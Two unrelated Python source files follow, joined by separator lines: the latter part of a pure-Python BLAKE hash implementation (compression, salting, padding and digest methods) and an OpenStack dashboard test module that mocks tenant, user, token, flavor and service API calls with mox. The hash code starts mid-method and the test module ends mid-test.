        """Compress one full message block into the chain value self.h."""
        byte2int = self.byte2int
        mul = self.mul  # de-reference these for ...speed?  ;-)
        cxx = self.cxx
        rot1 = self.rot1
        rot2 = self.rot2
        rot3 = self.rot3
        rot4 = self.rot4
        MASK = self.MASK
        WORDBITS = self.WORDBITS
        SIGMA = self.SIGMA

        # get message       (<<2 is the same as *4 but faster)
        m = [byte2int(block[i<<2<<mul:(i<<2<<mul)+(4<<mul)]) for i in range(16)]

        # initialization
        v = [0]*16
        v[ 0: 8] = [self.h[i] for i in range(8)]
        v[ 8:16] = [self.cxx[i] for i in range(8)]
        v[ 8:12] = [v[8+i] ^ self.salt[i] for i in range(4)]
        # fold the bit counter into the state unless nullt is raised
        # (special case \ell_i = 0 during final padding)
        if self.nullt == 0:
            v[12] = v[12] ^ (self.t & MASK)
            v[13] = v[13] ^ (self.t & MASK)
            v[14] = v[14] ^ (self.t >> self.WORDBITS)
            v[15] = v[15] ^ (self.t >> self.WORDBITS)

        # - - - - - - - - - - - - - - - - -
        # ready?  let's ChaCha!!!

        def G(a, b, c, d, i):
            # one quarter-round.  NOTE: ``round`` is the loop variable of
            # the enclosing for-loop below (it shadows the builtin name).
            va = v[a]  # it's faster to deref and reref later
            vb = v[b]
            vc = v[c]
            vd = v[d]
            sri  = SIGMA[round][i]
            sri1 = SIGMA[round][i+1]
            va = ((va + vb) + (m[sri] ^ cxx[sri1]) ) & MASK
            x = vd ^ va
            vd = (x >> rot1) | ((x << (WORDBITS-rot1)) & MASK)
            vc = (vc + vd) & MASK
            x = vb ^ vc
            vb = (x >> rot2) | ((x << (WORDBITS-rot2)) & MASK)
            va = ((va + vb) + (m[sri1] ^ cxx[sri]) ) & MASK
            x = vd ^ va
            vd = (x >> rot3) | ((x << (WORDBITS-rot3)) & MASK)
            vc = (vc + vd) & MASK
            x = vb ^ vc
            vb = (x >> rot4) | ((x << (WORDBITS-rot4)) & MASK)
            v[a] = va
            v[b] = vb
            v[c] = vc
            v[d] = vd

        for round in range(self.ROUNDS):
            # column step
            G( 0, 4, 8,12, 0)
            G( 1, 5, 9,13, 2)
            G( 2, 6,10,14, 4)
            G( 3, 7,11,15, 6)
            # diagonal step
            G( 0, 5,10,15, 8)
            G( 1, 6,11,12,10)
            G( 2, 7, 8,13,12)
            G( 3, 4, 9,14,14)

        # - - - - - - - - - - - - - - - - -
        # save current hash value   (use i&0x3 to get 0,1,2,3,0,1,2,3)
        self.h = [self.h[i]^v[i]^v[i+8]^self.salt[i&0x3]
                  for i in range(8)]
        # print 'self.h', [num2hex(h) for h in self.h]

    # - - - - - - - - - - - - - - - - - - - - - - - - - - -

    def addsalt(self, salt):
        """ adds a salt to the hash function (OPTIONAL)
            should be called AFTER Init, and BEFORE update
            salt:  a bytestring, length determined by hashbitlen.
                   if not of sufficient length, the bytestring
                   will be assumed to be a big endian number and
                   prefixed with an appropriate number of null
                   bytes, and if too large, only the low order
                   bytes will be used.

              if hashbitlen=224 or 256, then salt will be 16 bytes
              if hashbitlen=384 or 512, then salt will be 32 bytes
        """
        # fail if addsalt() was not called at the right time
        if self.state != 1:
            raise Exception('addsalt() not called after init() and before update()')
        # salt size is to be 4x word size
        saltsize = self.WORDBYTES * 4
        # if too short, prefix with null bytes.  if too long,
        # truncate high order bytes
        if len(salt) < saltsize:
            # NOTE(review): chr(0) produces a text string under Python3;
            # prefixing a *bytes* salt here would raise TypeError there
            # despite the module's Py2/Py3 claim -- confirm.
            salt = (chr(0)*(saltsize-len(salt)) + salt)
        else:
            salt = salt[-saltsize:]
        # prep the salt array
        self.salt[0] = self.byte2int(salt[ : 4<<self.mul])
        self.salt[1] = self.byte2int(salt[ 4<<self.mul: 8<<self.mul])
        self.salt[2] = self.byte2int(salt[ 8<<self.mul:12<<self.mul])
        self.salt[3] = self.byte2int(salt[12<<self.mul: ])

    # - - - - - - - - - - - - - - - - - - - - - - - - - - -

    def update(self, data):
        """ update the state with new data, storing excess data
            as necessary.  may be called multiple times and if a
            call sends less than a full block in size, the leftover
            is cached and will be consumed in the next call
            data:  data to be hashed (bytestring)
        """
        self.state = 2

        BLKBYTES = self.BLKBYTES  # de-referenced for improved readability
        BLKBITS = self.BLKBITS

        datalen = len(data)
        if not datalen:  return

        if type(data) == type(u''):
            # use either of the next two lines for a proper
            # response under both Python2 and Python3
            data = data.encode('UTF-8')  # converts to byte string
            #data = bytearray(data, 'utf-8')  # use if want mutable

        # This next line works for Py3 but fails under
        # Py2 because the Py2 version of bytes() will
        # accept only *one* argument.  Arrrrgh!!!
        #data = bytes(data, 'utf-8')  # converts to immutable byte
        #                             # string but... under p7
        #                             # bytes() wants only 1 arg
        # ...a dummy, 2nd argument like encoding=None
        # that does nothing would at least allow
        # compatibility between Python2 and Python3.

        left = len(self.cache)
        fill = BLKBYTES - left

        # if any cached data and any added new data will fill a
        # full block, fill and compress
        if left and datalen >= fill:
            self.cache = self.cache + data[:fill]
            self.t += BLKBITS  # update counter
            self._compress(self.cache)
            self.cache = b''
            data = data[fill:]
            datalen -= fill

        # compress new data until not enough for a full block
        while datalen >= BLKBYTES:
            self.t += BLKBITS  # update counter
            self._compress(data[:BLKBYTES])
            data = data[BLKBYTES:]
            datalen -= BLKBYTES

        # cache all leftover bytes until next call to update()
        if datalen > 0:
            self.cache = self.cache + data[:datalen]

    # - - - - - - - - - - - - - - - - - - - - - - - - - - -

    def final(self, data=''):
        """ finalize the hash -- pad and hash remaining data
            returns hashval, the digest
        """
        if self.state == 3:
            # we have already finalized so simply return the
            # previously calculated/stored hash value
            return self.hash

        if data:
            self.update(data)

        ZZ = b'\x00'
        ZO = b'\x01'
        OZ = b'\x80'
        OO = b'\x81'
        PADDING = OZ + ZZ*128  # pre-formatted padding data

        # copy nb. bits hash in total as a 64-bit BE word
        # copy nb. bits hash in total as a 128-bit BE word
        tt = self.t + (len(self.cache) << 3)
        if self.BLKBYTES == 64:
            msglen = self._int2eightByte(tt)
        else:
            low = tt & self.MASK
            high = tt >> self.WORDBITS
            msglen = self._int2eightByte(high) + self._int2eightByte(low)

        # size of block without the words at the end that count
        # the number of bits, 55 or 111.
        # Note: (((self.WORDBITS/8)*2)+1) equals ((self.WORDBITS>>2)+1)
        sizewithout = self.BLKBYTES - ((self.WORDBITS>>2)+1)

        if len(self.cache) == sizewithout:
            # special case of one padding byte
            self.t -= 8
            if self.hashbitlen in [224, 384]:
                self.update(OZ)
            else:
                self.update(OO)
        else:
            if len(self.cache) < sizewithout:
                # enough space to fill the block
                # use t=0 if no remaining data
                if len(self.cache) == 0:
                    self.nullt=1
                self.t -= (sizewithout - len(self.cache)) << 3
                self.update(PADDING[:sizewithout - len(self.cache)])
            else:
                # NOT enough space, need 2 compressions
                #   ...add marker, pad with nulls and compress
                self.t -= (self.BLKBYTES - len(self.cache)) << 3
                self.update(PADDING[:self.BLKBYTES - len(self.cache)])
                #   ...now pad w/nulls leaving space for marker & bit count
                self.t -= (sizewithout+1) << 3
                self.update(PADDING[1:sizewithout+1])  # pad with zeroes

                self.nullt = 1  # raise flag to set t=0 at the next _compress

            # append a marker byte
            if self.hashbitlen in [224, 384]:
                self.update(ZZ)
            else:
                self.update(ZO)
            self.t -= 8

        # append the number of bits (long long)
        # (len(msglen) in bits happens to equal BLKBYTES numerically
        # for both word sizes: 8 bytes = 64 bits, 16 bytes = 128 bits)
        self.t -= self.BLKBYTES
        self.update(msglen)

        hashval = []
        if self.BLKBYTES == 64:
            for h in self.h:
                hashval.append(self._int2fourByte(h))
        else:
            for h in self.h:
                hashval.append(self._int2eightByte(h))
        self.hash = b''.join(hashval)[:self.hashbitlen >> 3]
        self.state = 3

        return self.hash

    digest = final  # may use digest() as a synonym for final()

    # - - - - - - - - - - - - - - - - - - - - - - - - - - -

    def hexdigest(self, data=''):
        """Like final()/digest() but returns a lowercase hex string."""
        return hexlify(self.final(data)).decode('UTF-8')

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # utility functions

    def _fourByte2int(self, bytestr):  # see also long2byt() below
        """ convert a 4-byte string to an int (long) """
        return struct.unpack('!L', bytestr)[0]

    def _eightByte2int(self, bytestr):
        """ convert a 8-byte string to an int (long long) """
        return struct.unpack('!Q', bytestr)[0]

    def _int2fourByte(self, x):  # see also long2byt() below
        """ convert a number to a 4-byte string, high order
            truncation possible (in Python x could be a BIGNUM)
        """
        return struct.pack('!L', x)

    def _int2eightByte(self, x):
        """ convert a number to a 8-byte string, high order
            truncation possible (in Python x could be a BIGNUM)
        """
        return struct.pack('!Q', x)
#---------------------------------------------------------------
#---------------------------------------------------------------
#---------------------------------------------------------------
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Fourth Paradigm Development, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import cloudfiles
import httplib
import json
import mox
from django import http
from django.conf import settings
from django_openstack import api
from glance import client as glance_client
from mox import IsA
from openstack import compute as OSCompute
from openstackx import admin as OSAdmin
from openstackx import auth as OSAuth
from openstackx import extras as OSExtras
from django_openstack import test
from django_openstack.middleware import keystone
# Shared fixture values reused by the test cases in this module.
TEST_CONSOLE_KIND = 'vnc'
TEST_EMAIL = 'test@test.com'
TEST_HOSTNAME = 'hostname'
TEST_INSTANCE_ID = '2'
TEST_PASSWORD = '12345'
TEST_PORT = 8000
TEST_RETURN = 'retValue'
TEST_TENANT_DESCRIPTION = 'tenantDescription'
TEST_TENANT_ID = '1234'
TEST_TOKEN = 'aToken'
TEST_TOKEN_ID = 'userId'
# e.g. 'http://hostname:8000/something/v1.0'
TEST_URL = 'http://%s:%s/something/v1.0' % (TEST_HOSTNAME, TEST_PORT)
TEST_USERNAME = 'testUser'
class Server(object):
    """ More or less fakes what the api is looking for """
    def __init__(self, id, imageRef, attrs=None):
        self.id = id
        self.imageRef = imageRef
        # attrs is optional and deliberately left unset when not given,
        # so wrapper tests can assert AttributeError on access.
        if attrs is not None:
            self.attrs = attrs

    def __eq__(self, other):
        """Equal when id, imageRef and every recorded attr match.

        Bug fix: the original loop compared against an undefined name
        ``v`` (a NameError at runtime) and crashed with AttributeError
        when either side had no ``attrs``.
        """
        if self.id != other.id or \
           self.imageRef != other.imageRef:
            return False
        self_attrs = getattr(self, 'attrs', {})
        other_attrs = getattr(other, 'attrs', {})
        for k, v in self_attrs.items():
            # attrs is a plain dict in these tests; fall back to
            # attribute access for wrapper-style objects.
            if isinstance(other_attrs, dict):
                other_v = other_attrs.get(k)
            else:
                other_v = getattr(other_attrs, k, None)
            if other_v != v:
                return False
        return True

    def __ne__(self, other):
        return not self == other
class Tenant(object):
    """Stand-in for the tenant objects the api module returns."""

    def __init__(self, id, description, enabled):
        self.id = id
        self.description = description
        self.enabled = enabled

    def __eq__(self, other):
        # two tenants match only when all three fields agree
        same_id = self.id == other.id
        same_desc = self.description == other.description
        same_state = self.enabled == other.enabled
        return same_id and same_desc and same_state

    def __ne__(self, other):
        return not self.__eq__(other)
class Token(object):
    """Stand-in for the token objects the api module returns."""

    def __init__(self, id, username, tenant_id, serviceCatalog=None):
        self.id = id
        self.username = username
        self.tenant_id = tenant_id
        self.serviceCatalog = serviceCatalog

    def __eq__(self, other):
        # equal only when every field matches the other token
        for field in ('id', 'username', 'tenant_id', 'serviceCatalog'):
            if getattr(self, field) != getattr(other, field):
                return False
        return True

    def __ne__(self, other):
        return not self.__eq__(other)
class APIResource(api.APIResourceWrapper):
    """Simple APIResource for testing."""
    _attrs = ['foo', 'bar', 'baz']

    @staticmethod
    def get_instance(innerObject=None):
        """Wrap innerObject; fabricate an inner object when none given."""
        if innerObject is not None:
            return APIResource(innerObject)

        class InnerAPIResource(object):
            pass

        # default inner object exposes foo/bar but deliberately not baz
        inner = InnerAPIResource()
        inner.foo = 'foo'
        inner.bar = 'bar'
        return APIResource(inner)
class APIDict(api.APIDictWrapper):
    """Simple APIDict for testing."""
    _attrs = ['foo', 'bar', 'baz']

    @staticmethod
    def get_instance(innerDict=None):
        """Wrap innerDict; the default inner dict has foo/bar but no baz."""
        if innerDict is None:
            innerDict = {'foo': 'foo', 'bar': 'bar'}
        return APIDict(innerDict)
class APIResourceWrapperTests(test.TestCase):
    """Attribute delegation behavior of api.APIResourceWrapper."""

    def test_get_attribute(self):
        # attrs listed in _attrs and present on the inner object resolve
        resource = APIResource.get_instance()
        self.assertEqual(resource.foo, 'foo')

    def test_get_invalid_attribute(self):
        # attrs not listed in _attrs raise AttributeError
        resource = APIResource.get_instance()
        self.assertNotIn('missing', resource._attrs,
                         msg="Test assumption broken. Find new missing attribute")
        with self.assertRaises(AttributeError):
            resource.missing

    def test_get_inner_missing_attribute(self):
        # 'baz' is in _attrs but absent from the inner object
        resource = APIResource.get_instance()
        with self.assertRaises(AttributeError):
            resource.baz
class APIDictWrapperTests(test.TestCase):
    # APIDict allows for both attribute access and dictionary style [element]
    # style access.  Test both
    def test_get_item(self):
        resource = APIDict.get_instance()
        self.assertEqual(resource.foo, 'foo')
        self.assertEqual(resource['foo'], 'foo')

    def test_get_invalid_item(self):
        # keys not listed in _attrs fail both access styles
        resource = APIDict.get_instance()
        self.assertNotIn('missing', resource._attrs,
                         msg="Test assumption broken. Find new missing attribute")
        with self.assertRaises(AttributeError):
            resource.missing
        with self.assertRaises(KeyError):
            resource['missing']

    def test_get_inner_missing_attribute(self):
        # 'baz' is in _attrs but absent from the inner dict
        resource = APIDict.get_instance()
        with self.assertRaises(AttributeError):
            resource.baz
        with self.assertRaises(KeyError):
            resource['baz']

    def test_get_with_default(self):
        # .get() mirrors dict.get(): None or an explicit default on miss
        resource = APIDict.get_instance()

        self.assertEqual(resource.get('foo'), 'foo')

        self.assertIsNone(resource.get('baz'))

        self.assertEqual('retValue', resource.get('baz', 'retValue'))
# Wrapper classes that only define _attrs don't need extra testing.
# Wrapper classes that have other attributes or methods need testing
class ImageWrapperTests(test.TestCase):
    """Tests for the api.Image wrapper and its nested properties dict."""

    dict_with_properties = {
        'properties':
            {'image_state': 'running'},
        'size': 100,
    }
    dict_without_properties = {
        'size': 100,
    }

    def test_get_properties(self):
        # nested 'properties' dict is wrapped in api.ImageProperties
        image = api.Image(self.dict_with_properties)
        image_props = image.properties
        self.assertIsInstance(image_props, api.ImageProperties)
        self.assertEqual(image_props.image_state, 'running')

    def test_get_other(self):
        image = api.Image(self.dict_with_properties)
        self.assertEqual(image.size, 100)

    def test_get_properties_missing(self):
        image = api.Image(self.dict_without_properties)
        with self.assertRaises(AttributeError):
            image.properties

    def test_get_other_missing(self):
        image = api.Image(self.dict_without_properties)
        with self.assertRaises(AttributeError):
            self.assertNotIn('missing', image._attrs,
                             msg="Test assumption broken. Find new missing attribute")
            image.missing
class ServerWrapperTests(test.TestCase):
    """Tests for the api.Server wrapper around an inner server object."""

    HOST = 'hostname'
    ID = '1'
    IMAGE_NAME = 'imageName'
    IMAGE_REF = '3'

    def setUp(self):
        super(ServerWrapperTests, self).setUp()

        # these are all objects "fetched" from the api
        self.inner_attrs = {'host': self.HOST}

        self.inner_server = Server(self.ID, self.IMAGE_REF, self.inner_attrs)
        self.inner_server_no_attrs = Server(self.ID, self.IMAGE_REF)

        #self.request = self.mox.CreateMock(http.HttpRequest)

    def test_get_attrs(self):
        server = api.Server(self.inner_server, self.request)
        attrs = server.attrs
        # for every attribute in the "inner" object passed to the api wrapper,
        # see if it can be accessed through the api.ServerAttribute instance
        for k in self.inner_attrs:
            self.assertEqual(attrs.__getattr__(k), self.inner_attrs[k])

    def test_get_other(self):
        server = api.Server(self.inner_server, self.request)
        self.assertEqual(server.id, self.ID)

    def test_get_attrs_missing(self):
        # inner server was built without attrs, so delegation must fail
        server = api.Server(self.inner_server_no_attrs, self.request)
        with self.assertRaises(AttributeError):
            server.attrs

    def test_get_other_missing(self):
        server = api.Server(self.inner_server, self.request)
        with self.assertRaises(AttributeError):
            self.assertNotIn('missing', server._attrs,
                             msg="Test assumption broken. Find new missing attribute")
            server.missing

    def test_image_name(self):
        # image_name triggers an api.image_get lookup by imageRef
        self.mox.StubOutWithMock(api, 'image_get')
        api.image_get(IsA(http.HttpRequest),
                      self.IMAGE_REF
                      ).AndReturn(api.Image({'name': self.IMAGE_NAME}))

        server = api.Server(self.inner_server, self.request)

        self.mox.ReplayAll()

        image_name = server.image_name

        self.assertEqual(image_name, self.IMAGE_NAME)

        self.mox.VerifyAll()
class ApiHelperTests(test.TestCase):
    """ Tests for functions that don't use one of the api objects """

    def test_url_for(self):
        GLANCE_URL = 'http://glance/glanceapi/'
        NOVA_URL = 'http://nova/novapi/'

        # NOTE: serviceCatalog is now constructed as part of the user object
        # serviceCatalog = {
        #     'glance': [{'adminURL': GLANCE_URL + 'admin',
        #                 'internalURL': GLANCE_URL + 'internal'},
        #                ],
        #     'nova': [{'adminURL': NOVA_URL + 'admin',
        #               'internalURL': NOVA_URL + 'internal'},
        #              ],
        #     }

        # default and admin=False both resolve to the internal URL;
        # admin=True resolves to the admin URL
        url = api.url_for(self.request, 'glance')
        self.assertEqual(url, GLANCE_URL + 'internal')

        url = api.url_for(self.request, 'glance', admin=False)
        self.assertEqual(url, GLANCE_URL + 'internal')

        url = api.url_for(self.request, 'glance', admin=True)
        self.assertEqual(url, GLANCE_URL + 'admin')

        url = api.url_for(self.request, 'nova')
        self.assertEqual(url, NOVA_URL + 'internal')

        url = api.url_for(self.request, 'nova', admin=False)
        self.assertEqual(url, NOVA_URL + 'internal')

        url = api.url_for(self.request, 'nova', admin=True)
        self.assertEqual(url, NOVA_URL + 'admin')

    def test_token_info(self):
        """ This function uses the keystone api, but not through an
            api client, because there doesn't appear to be one for
            keystone
        """
        GLANCE_URL = 'http://glance/glance_api/'
        KEYSTONE_HOST = 'keystonehost'
        KEYSTONE_PORT = 8080
        KEYSTONE_URL = 'http://%s:%d/keystone/' % (KEYSTONE_HOST,
                                                   KEYSTONE_PORT)

        serviceCatalog = {
            'glance': [{'adminURL': GLANCE_URL + 'admin',
                        'internalURL': GLANCE_URL + 'internal'},
                       ],
            'identity': [{'adminURL': KEYSTONE_URL + 'admin',
                          'internalURL': KEYSTONE_URL + 'internal'},
                         ],
            }

        # NOTE(review): argument order here gives username=TEST_TENANT_ID
        # and tenant_id=TEST_USERNAME per Token.__init__ -- confirm whether
        # the swap is intentional for this test.
        token = Token(TEST_TOKEN_ID, TEST_TENANT_ID,
                      TEST_USERNAME, serviceCatalog)

        jsonData = {
            'auth': {
                'token': {
                    'expires': '2011-07-02T02:01:19.382655',
                    'id': '3c5748d5-bec6-4215-843a-f959d589f4b0',
                },
                'user': {
                    'username': 'joeuser',
                    'roleRefs': [{'roleId': 'Minion'}],
                    'tenantId': u'1234'
                }
            }
        }

        jsonDataAdmin = {
            'auth': {
                'token': {
                    'expires': '2011-07-02T02:01:19.382655',
                    'id': '3c5748d5-bec6-4215-843a-f959d589f4b0',
                },
                'user': {
                    'username': 'joeuser',
                    'roleRefs': [{'roleId': 'Admin'}],
                    'tenantId': u'1234'
                }
            }
        }

        # setup test where user is not admin
        self.mox.StubOutClassWithMocks(httplib, 'HTTPConnection')
        conn = httplib.HTTPConnection(KEYSTONE_HOST, KEYSTONE_PORT)
        response = self.mox.CreateMock(httplib.HTTPResponse)
        conn.request(IsA(str), IsA(str), headers=IsA(dict))
        conn.getresponse().AndReturn(response)
        response.read().AndReturn(json.dumps(jsonData))
        expected_nonadmin_val = {
            'tenant': '1234',
            'user': 'joeuser',
            'admin': False
        }

        # setup test where user is admin
        conn = httplib.HTTPConnection(KEYSTONE_HOST, KEYSTONE_PORT)
        response = self.mox.CreateMock(httplib.HTTPResponse)
        conn.request(IsA(str), IsA(str), headers=IsA(dict))
        conn.getresponse().AndReturn(response)
        response.read().AndReturn(json.dumps(jsonDataAdmin))
        expected_admin_val = {
            'tenant': '1234',
            'user': 'joeuser',
            'admin': True
        }

        self.mox.ReplayAll()

        # first call consumes the non-admin response, second the admin one
        ret_val = api.token_info(None, token)
        self.assertDictEqual(ret_val, expected_nonadmin_val)

        ret_val = api.token_info(None, token)
        self.assertDictEqual(ret_val, expected_admin_val)

        self.mox.VerifyAll()
class AccountApiTests(test.TestCase):
    """Tests for the api tenant/user helpers.

    Each test follows the same mox record/replay pattern: stub the
    account api, record the expected downstream call, ReplayAll, invoke
    the api helper, assert the wrapped return value, then VerifyAll.
    """

    def stub_account_api(self):
        # replace api.account_api with a mock Account for a single call
        self.mox.StubOutWithMock(api, 'account_api')
        account_api = self.mox.CreateMock(OSExtras.Account)
        api.account_api(IsA(http.HttpRequest)).AndReturn(account_api)
        return account_api

    def test_get_account_api(self):
        self.mox.StubOutClassWithMocks(OSExtras, 'Account')
        OSExtras.Account(auth_token=TEST_TOKEN, management_url=TEST_URL)

        self.mox.StubOutWithMock(api, 'url_for')
        # url_for is consulted twice while building the client
        api.url_for(
            IsA(http.HttpRequest), 'identity', True).AndReturn(TEST_URL)
        api.url_for(
            IsA(http.HttpRequest), 'identity', True).AndReturn(TEST_URL)

        self.mox.ReplayAll()

        self.assertIsNotNone(api.account_api(self.request))

        self.mox.VerifyAll()

    def test_tenant_create(self):
        DESCRIPTION = 'aDescription'
        ENABLED = True

        account_api = self.stub_account_api()

        account_api.tenants = self.mox.CreateMockAnything()
        account_api.tenants.create(TEST_TENANT_ID, DESCRIPTION,
                                   ENABLED).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.tenant_create(self.request, TEST_TENANT_ID,
                                    DESCRIPTION, ENABLED)

        self.assertIsInstance(ret_val, api.Tenant)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()

    def test_tenant_get(self):
        account_api = self.stub_account_api()

        account_api.tenants = self.mox.CreateMockAnything()
        account_api.tenants.get(TEST_TENANT_ID).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.tenant_get(self.request, TEST_TENANT_ID)

        self.assertIsInstance(ret_val, api.Tenant)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()

    def test_tenant_list(self):
        tenants = (TEST_RETURN, TEST_RETURN + '2')

        account_api = self.stub_account_api()

        account_api.tenants = self.mox.CreateMockAnything()
        account_api.tenants.list().AndReturn(tenants)

        self.mox.ReplayAll()

        ret_val = api.tenant_list(self.request)

        # every element comes back wrapped in api.Tenant
        self.assertEqual(len(ret_val), len(tenants))
        for tenant in ret_val:
            self.assertIsInstance(tenant, api.Tenant)
            self.assertIn(tenant._apiresource, tenants)

        self.mox.VerifyAll()

    def test_tenant_update(self):
        DESCRIPTION = 'aDescription'
        ENABLED = True

        account_api = self.stub_account_api()

        account_api.tenants = self.mox.CreateMockAnything()
        account_api.tenants.update(TEST_TENANT_ID, DESCRIPTION,
                                   ENABLED).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.tenant_update(self.request, TEST_TENANT_ID,
                                    DESCRIPTION, ENABLED)

        self.assertIsInstance(ret_val, api.Tenant)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()

    def test_user_create(self):
        account_api = self.stub_account_api()

        account_api.users = self.mox.CreateMockAnything()
        account_api.users.create(TEST_USERNAME, TEST_EMAIL, TEST_PASSWORD,
                                 TEST_TENANT_ID, True).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.user_create(self.request, TEST_USERNAME, TEST_EMAIL,
                                  TEST_PASSWORD, TEST_TENANT_ID, True)

        self.assertIsInstance(ret_val, api.User)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()

    def test_user_delete(self):
        account_api = self.stub_account_api()

        account_api.users = self.mox.CreateMockAnything()
        account_api.users.delete(TEST_USERNAME).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        # delete returns nothing even though the backend returned a value
        ret_val = api.user_delete(self.request, TEST_USERNAME)

        self.assertIsNone(ret_val)

        self.mox.VerifyAll()

    def test_user_get(self):
        account_api = self.stub_account_api()

        account_api.users = self.mox.CreateMockAnything()
        account_api.users.get(TEST_USERNAME).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.user_get(self.request, TEST_USERNAME)

        self.assertIsInstance(ret_val, api.User)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()

    def test_user_list(self):
        users = (TEST_USERNAME, TEST_USERNAME + '2')

        account_api = self.stub_account_api()

        account_api.users = self.mox.CreateMockAnything()
        account_api.users.list().AndReturn(users)

        self.mox.ReplayAll()

        ret_val = api.user_list(self.request)

        # every element comes back wrapped in api.User
        self.assertEqual(len(ret_val), len(users))
        for user in ret_val:
            self.assertIsInstance(user, api.User)
            self.assertIn(user._apiresource, users)

        self.mox.VerifyAll()

    def test_user_update_email(self):
        account_api = self.stub_account_api()

        account_api.users = self.mox.CreateMockAnything()
        account_api.users.update_email(TEST_USERNAME,
                                       TEST_EMAIL).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.user_update_email(self.request, TEST_USERNAME,
                                        TEST_EMAIL)

        self.assertIsInstance(ret_val, api.User)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()

    def test_user_update_password(self):
        account_api = self.stub_account_api()

        account_api.users = self.mox.CreateMockAnything()
        account_api.users.update_password(TEST_USERNAME,
                                          TEST_PASSWORD).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.user_update_password(self.request, TEST_USERNAME,
                                           TEST_PASSWORD)

        self.assertIsInstance(ret_val, api.User)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()

    def test_user_update_tenant(self):
        account_api = self.stub_account_api()

        account_api.users = self.mox.CreateMockAnything()
        account_api.users.update_tenant(TEST_USERNAME,
                                        TEST_TENANT_ID).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.user_update_tenant(self.request, TEST_USERNAME,
                                         TEST_TENANT_ID)

        self.assertIsInstance(ret_val, api.User)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()
class AdminApiTests(test.TestCase):
    """Tests for the api flavor/service admin helpers (mox record/replay)."""

    def stub_admin_api(self, count=1):
        # replace api.admin_api with a mock Admin, expected ``count`` times
        self.mox.StubOutWithMock(api, 'admin_api')
        admin_api = self.mox.CreateMock(OSAdmin.Admin)
        for i in range(count):
            api.admin_api(IsA(http.HttpRequest)).AndReturn(admin_api)
        return admin_api

    def test_get_admin_api(self):
        self.mox.StubOutClassWithMocks(OSAdmin, 'Admin')
        OSAdmin.Admin(auth_token=TEST_TOKEN, management_url=TEST_URL)

        self.mox.StubOutWithMock(api, 'url_for')
        # url_for is consulted twice while building the client
        api.url_for(IsA(http.HttpRequest), 'nova', True).AndReturn(TEST_URL)
        api.url_for(IsA(http.HttpRequest), 'nova', True).AndReturn(TEST_URL)

        self.mox.ReplayAll()

        self.assertIsNotNone(api.admin_api(self.request))

        self.mox.VerifyAll()

    def test_flavor_create(self):
        FLAVOR_DISK = 1000
        FLAVOR_ID = 6
        FLAVOR_MEMORY = 1024
        FLAVOR_NAME = 'newFlavor'
        FLAVOR_VCPU = 2

        admin_api = self.stub_admin_api()

        admin_api.flavors = self.mox.CreateMockAnything()
        admin_api.flavors.create(FLAVOR_NAME, FLAVOR_MEMORY, FLAVOR_VCPU,
                                 FLAVOR_DISK, FLAVOR_ID).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        # api.flavor_create accepts the numeric values as strings
        ret_val = api.flavor_create(self.request, FLAVOR_NAME,
                                    str(FLAVOR_MEMORY), str(FLAVOR_VCPU),
                                    str(FLAVOR_DISK), FLAVOR_ID)

        self.assertIsInstance(ret_val, api.Flavor)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()

    def test_flavor_delete(self):
        FLAVOR_ID = 6

        # two api.admin_api lookups: one per flavor_delete call below
        admin_api = self.stub_admin_api(count=2)
        admin_api.flavors = self.mox.CreateMockAnything()
        admin_api.flavors.delete(FLAVOR_ID, False).AndReturn(TEST_RETURN)
        admin_api.flavors.delete(FLAVOR_ID, True).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.flavor_delete(self.request, FLAVOR_ID)
        self.assertIsNone(ret_val)

        ret_val = api.flavor_delete(self.request, FLAVOR_ID, purge=True)
        self.assertIsNone(ret_val)
        # NOTE(review): unlike the other tests in this class there is no
        # self.mox.VerifyAll() here -- confirm whether that is intentional.

    def test_service_get(self):
        NAME = 'serviceName'

        admin_api = self.stub_admin_api()
        admin_api.services = self.mox.CreateMockAnything()
        admin_api.services.get(NAME).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.service_get(self.request, NAME)

        self.assertIsInstance(ret_val, api.Services)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()

    def test_service_list(self):
        services = (TEST_RETURN, TEST_RETURN + '2')

        admin_api = self.stub_admin_api()
        admin_api.services = self.mox.CreateMockAnything()
        admin_api.services.list().AndReturn(services)

        self.mox.ReplayAll()

        ret_val = api.service_list(self.request)

        # every element comes back wrapped in api.Services
        for service in ret_val:
            self.assertIsInstance(service, api.Services)
            self.assertIn(service._apiresource, services)

        self.mox.VerifyAll()

    def test_service_update(self):
        ENABLED = True
